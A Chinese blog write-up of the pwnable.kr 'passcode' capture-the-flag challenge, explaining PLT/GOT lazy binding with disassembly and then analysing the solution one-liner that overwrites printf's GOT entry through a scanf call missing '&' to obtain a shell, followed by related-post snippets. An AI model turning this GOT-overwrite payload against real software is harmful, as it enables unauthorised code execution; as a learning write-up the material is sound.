pwnable.kr 之passcode summary

最新推荐文章于 2022-10-03 13:56:40 发布
最新推荐文章于 2022-10-03 13:56:40 发布
阅读量689 收藏 1
点赞数
分类专栏: PWN 文章标签: pwnable-kr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/70505151
版权

本人写这篇博客完全是为了方便以后查证,若能帮上各位的忙,在线非常宽慰.
关于pwnable.kr上的passcode,这博客写的很到位,大家不妨去看一下:passcode.我在这里只是补充几个问题,再将整个过程简单化而已.
1.plt表和got表的关系
  plt表—->got表.当程序中有需要库函数时,该plt和got表上场了.我们来举一个简单的例子(test.c):

#include <stdio.h>
void showmsg(char *szMsg)
{
    printf("%s\n", szMsg);
}
int main(int argc, char **argv)
{
    char szMsg[] = "Hello, world!";
    showmsg(szMsg);
    return 0;
}

对于这个简单的程序,流程如下:
main—>showmsg—>printf.
printf函数是一个库函数,需要引入库调用,但在编译阶段是不清楚printf函数的地址(地址随机化).

void showmsg(char *szMsg)
{
 8048434:   55                      push   %ebp
 8048435:   89 e5                   mov    %esp,%ebp
 8048437:   83 ec 18                sub    $0x18,%esp
    printf("%s\n", szMsg);
 804843a:   8b 45 08                mov    0x8(%ebp),%eax
 804843d:   89 04 24                mov    %eax,(%esp)
 8048440:   e8 0b ff ff ff          call   8048350 <puts@plt>
}
 8048445:   c9                      leave  
 8048446:   c3                      ret

从这个函数的汇编代码上可以看出,需要跳到0x8048350,这就是puts的plt,然后:

08048350 <puts@plt>:
 8048350:   ff 25 04 a0 04 08       jmp    *0x804a004
 8048356:   68 08 00 00 00          push   $0x8
 804835b:   e9 d0 ff ff ff          jmp    8048330 <_init+0x38>

第一条指令跳转到0x0804a004地址处的值去执行,实际上0x0804a004就是一个对应的GOT(Global Offset Table)条目的位置了.我们使用:readelf -r test,得出:

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a000 R_386_JUMP_SLOT   __stack_chk_fail
0804a004 R_386_JUMP_SLOT   puts
0804a008 R_386_JUMP_SLOT   __gmon_start__
0804a00c R_386_JUMP_SLOT   __libc_start_main

也得出了puts的Got的地址

(gdb) x 0x804a004
0x804a004 <puts@got.plt>:   0x08048356

看到Got对应的函数地址,但printf经过第一次的调用之后,这个值会发生是改变.

(gdb) x 0x0804a004
0x804a004 <puts@got.plt>:   0x001913b0

原因是:PLT其实是延迟绑定技术,也就是等到调用函数的时候才进行函数地址的定位.第一次调用,plt—->got—->运算.将运算结果返回给got,这个运算结果是puts函数真正的代码所在处,下回再调用printf函数的时候,直接就是plt—->got—->代码.省掉了中间的运算过程,所以说,第一次稍微慢一点,后边就快了.
第二个问题:
答案的分析:

python -c "print ('a'*96+'\x00\xa0\x04\x08'+'\n'+'134514147\n')" | ./passcode

这里主要分析'\x00\xa0\x04\x08'+'\n'+'134514147\n'
0x0804a000是print函数的got表中的地址,在welcome中输入96个a+’\x00\xa0\x04\x08’.结果呢,login中的scanf函数在输入的时候,直接变量的地址就是:0x0804a000,输入的134514147(0x080485e3),将0x0804a000原有的地址给覆写了.这就是got表复写.在执行printf函数的时候,实际上执行的是system函数.
简单的说:
plt—->got—->真地址(printf函数的代码),经过我们覆写之后,
plt—->got—->假地址(system函数的代码).
这样我们就获得了shell.
第三个问题:为什么输入的内容刚好覆写printf函数的got表呢?
原因是:scanf(“%d”,a);无&符号.听别人讲:如果scanf没加&的话,程序会默认从栈中读取4个字节的数据当做scanf取的地址.这个栈应该是变量a的栈.就是说将a的值,16进制化作为地址,将你输入的内容写入这个地址中.如果这个地址不存在或不可写,将会报错.
左-right,右图-wrong
从这个地方,我们可以看到无&的,取得地址是0x00007fff.

qq_33528164
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.krpasscode
Jason_ZhouYetao的博客
06-27 338
这题主要是的难点是GOT覆写技术的运用。这里推荐几篇文章有关栈溢出和GOT表和PLT表知识的文章。 栈溢出从入门到放弃(上) 栈溢出从入门到放弃(下) GOT表和PLT表知识详解 话不多说,先看正题。 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; void login(){ int passcode1; int passco...
pwnable.kr-passcode
qq_35661990的博客
09-18 599
这道题的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。 函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。 另外一点就是scanf的参数如果没有&amp;地址符,就把参数所在栈内的4个字节(我认为是因为题目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有地址符,程序执行lea指...
pwnable-passcode
网安星空
01-30 2697
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是passcode,主要考察的是函数scanf()的知识点。
pwnable.kr passcode
r250414958的博客
04-21 392
题目来自pwnable.kr 里面的思路是通过学习别人的文章获得的,作为个人的学习记录一下 题目是这样的 passcode SSH连接一下 看看有什么文件 可以看到有三个文件,其中 flag 只对创建者 passcode_pwn 和 root 可读,而我们登录的用户是 passcode(从连接时的用户名或使用 whoami 命令可以得知),因此是没有权限读这个文件的。passcode 对有所有...
pwnable.krpasscode
think_ycx的专栏
07-09 544
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机,可...
PWN passcode [pwnable.kr]CTF writeup题解系列5
重新启程
01-01 901
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \|...
pwnable.kr-----解题过程】collision
lyuchen65的博客
09-16 2561
#include #include unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i<5; i++){ res += ip[i]; } return res; } in
pwnable.kr解题——flag、passcode
shutdown -s -t
08-17 478
pwnable.kr —— flag 送分题 下载文件,查看一下,是ELF文件并且有UPX壳。这个壳只是个压缩壳,不是难事,脱壳。之后用IDA打开看一下,载完之后主函数就是整个逻辑,malloc()一个空间,然后使用strcpy复制。数据的来源也很清晰,来自CS段的flag变量。直接进入到cs:flag的位置复制出来目标字符串提交即可。 pwnable.kr —— passcode 题目...
pwnable.kr之collision
Jason_ZhouYetao的博客
06-18 462
这题先看题目源码 #include &lt;stdio.h&gt; #include &lt;string.h&gt; unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i&lt;5...
pwnable.kr - passcode
ACdream
10-12 526
pwnable.kr passcode
Pwnablepasscode
neuisf的博客
12-15 257
pwnable第一道求助题 前几天开始做pwnable的练习题,前四题比较容易,到了第五题,本机调试可以获取flag,但是,在远程主机上却失败了。 原因:本机某地址可写入而远程主机该地址不可写导致程序异常。 漏洞:源代码passcode.c的第九行,scanf的参数passcode1未初始化且无&符号,导致实际读入的数字写入到了passcode1的值所代表的地址中,而不是读取到pas...
pwnable.kr第五题:passcode
10-04 209
0x000打开环境 ①查看源码: 1 #include 2 #include 3 4 void login(){ 5 int passcode1; 6 int passcode2; 7 8 printf("enter passcode1 : "); 9 scanf("%d"...
pwnable.krpasscode
搓雪小怪兽的工作室
08-26 277
题目描述 Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2...
[pwnable.kr]passcode
iekuil的博客
10-03 296
->plt[1]第一条指令jmp *got[3] --> plt[1]第二条指令压栈 --> plt[1]第三条指令jmp plt[0] --> plt[0]第一条指令再压栈 --> plt[0]第二条指令jmp *got[2] --> 进入动态链接函数 --> 回写got表&调用目标函数。got[3],即804a000处实际存的值是8048426,即plt[1]中第二条指令的位置,除了plt[0]和got[0]、got[1]、got[2]有特殊作用外,
pwnable passcode 10pt
热门推荐
龙哥盟
03-18 3万+
题目在ssh passcode@pwnable.kr -p2222 (pw:guest)先看passcode.c:#include <stdio.h> #include <stdlib.h>void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); s
pwnable.kr [Toddler's Bottle] - passcode
Re:Umiade.tr
03-27 539
Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.k
passcode文件怎么打开
最新发布
12-02
要打开passcode文件,首先需要确认文件的格式和类型。如果这是一个文本文件,可以使用任何文本编辑器,如记事本、文本编辑器或专业的代码编辑器来打开它。在文件资源管理器或Finder中找到该文件,右键单击并选择...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值